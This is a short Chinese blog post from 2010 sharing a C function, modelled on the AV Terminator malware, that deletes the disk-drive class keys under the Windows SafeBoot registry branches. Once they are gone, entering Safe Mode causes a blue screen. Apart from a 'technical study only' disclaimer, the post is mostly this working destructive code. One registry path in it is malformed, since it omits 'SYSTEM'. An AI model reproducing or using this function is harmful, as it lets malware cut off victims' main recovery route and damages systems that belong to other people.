写了个破坏安全模式的函数

参考AV终结者写的一个小函数,直接删注册表的内容,方法很简单,不过网上很少看到有这方面的资料,恢复起来也容易:)

/*
破坏安全模式,by:乱雪
2010.1.24
警告:仅用于技术学习使用,禁止使用到非法用途.
说明:直接通过删除注册表里关键子键达到无法进入安全模式的目的,一进安全模式就蓝屏,参考AV终结者的功能写的.
*/

VOID KillSafeMode()
{
    HKEY hKey[5];
    ::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal",&hKey[1]);
    ::RegDeleteKey(hKey[1],"{4D36E967-E325-11CE-BFC1-08002BE10318}");

    ::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network",&hKey[2]);
    ::RegDeleteKey(hKey[2],"{4D36E967-E325-11CE-BFC1-08002BE10318}");

    ::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal",&hKey[3]);
    ::RegDeleteKey(hKey[3],"{4D36E967-E325-11CE-BFC1-08002BE10318}");

    ::RegOpenKey(HKEY_LOCAL_MACHINE,"CurrentControlSet\\Control\\SafeBoot\\Network",&hKey[4]);
    ::RegDeleteKey(hKey[4],"{4D36E967-E325-11CE-BFC1-08002BE10318}");

    ::RegCloseKey(hKey[1]);
    ::RegCloseKey(hKey[2]);
    ::RegCloseKey(hKey[3]);
    ::RegCloseKey(hKey[4]);
}